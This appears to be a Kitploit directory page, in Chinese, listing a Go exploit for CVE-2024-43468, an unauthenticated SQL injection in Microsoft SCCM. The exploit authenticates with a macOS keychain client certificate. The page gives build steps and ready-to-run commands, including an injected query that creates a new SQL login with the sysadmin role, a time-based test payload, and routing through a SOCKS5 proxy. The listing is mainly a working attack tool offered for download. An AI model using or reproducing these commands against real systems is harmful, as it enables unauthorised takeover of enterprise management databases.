Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 SCCM SQL注入利用(mTLS 从MacOS钥匙串中提取不可导出的客户端证书的版本) | Kitploit
工具/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证红队
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 SCCM SQL注入利用(mTLS 从MacOS钥匙串中提取不可导出的客户端证书的版本)

查看仓库
3221年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-43468 SCCM SQL 注入利用(基于 macOS 钥匙串的 mTLS 客户端证书版本)

使用 macOS 钥匙串进行 mTLS 认证(无需从钥匙串导出密钥)的 CVE-2024-43468 利用的 Go 实现。

此外:

  • 增加了代理支持,避免使用有问题的 proxychains。
  • 增加了 get_cert_name.py 用于获取证书通用名称(是的,你也可以手动从钥匙串访问 GUI 中获取)。
  • 增加了大量调试信息,以便了解实际运行情况。

基于:

  • 原始 Python 利用
  • mTLS Go 客户端示例

描述

利用 Microsoft Configuration Manager(ConfigMgr / SCCM)中未经认证的 SQL 注入漏洞,允许具有管理点网络访问权限的攻击者在站点数据库上执行任意 SQL 查询。

受影响版本:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# 安装依赖
go get github.com/google/uuid
go get golang.org/x/net/proxy

# 编译
go build -o sccm

使用

root@kitploit:~
# 显示帮助
./sccm -h

# 基本用法(创建新管理员)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# 使用自定义代理(通过 sleep 5 测试)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

参数

  • -t : 目标 URL(必需)
  • -sql : 要执行的 SQL 查询(必需)
  • -cn : macOS 钥匙串中的证书通用名称(必需)
  • -proxy : SOCKS5 代理地址(默认:空)

要求

  • macOS(用于钥匙串集成)
  • Go 1.16+
  • macOS 钥匙串中的客户端证书
  • 可选:SOCKS5 代理

参考

  • Microsoft 公告
  • Synacktiv 公告
  • mTLS Go 客户端示例
下载工具